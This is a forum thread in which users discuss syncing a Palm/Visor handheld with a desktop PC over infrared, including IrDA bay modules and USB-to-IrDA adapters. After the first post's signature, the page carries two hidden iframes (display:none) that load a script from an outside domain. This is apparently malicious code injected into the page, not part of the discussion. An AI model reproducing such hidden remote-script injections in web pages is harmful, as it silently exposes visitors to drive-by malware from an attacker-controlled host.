+ Reply to Thread
    User ***** Rulz Enforcer

Lightbulb Infrared Port to Synch

I think I thought I saw someone mention synch'ing w/ IR, that'd be great cause I have two puters in different location, and would like to keep the charger at one and synch at the other....

An ir solutions sounds like it'd be the cheapest... where do i find one tho? Does anybody have one working? What model and where did you get it?

tia

chris<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

if your pc has a ir port than your in bizz..

just select the ir from the phone ( go into hotsync), tap the icon and sync away...

make sure you have your ir beam turned on...

User ***** Rulz Enforcer
    Um... my computer doesn't have an IR port, it's a tower computer...

something external perhaps?

went looking around today, no luck...

anybody?

tia

chris

If your computer is relatively new (maybe within the last few years), it may have IR capability built in. Check your BIOS to see if it has a setting for IrDA (to enable or disable). If so, then your system already has IR capability, it just doesn't have an IrDA sender / receiver.

You can find such a thing at this link here. It mounts in a 3.5" external facing drive bay, and connects on the inside to the IrDA header that would be on most motherboards that have IrDA support.

If you don't have a motherboard with IrDA support already, or don't like the idea of opening your computer, for a little more money you could look at an IrDA adapter like this one. This is a USB to IrDA adapter. I imagine there are some others similar to this as well. A search on google for IrDA USB adapter will find them.

Don't know if any of these will work for IR synching... I still haven't got IR synching working between my laptop and a Visor Deluxe (waiting for my I-300 to arrive)!
    - Dan Butterfield (dan@butterfields.net)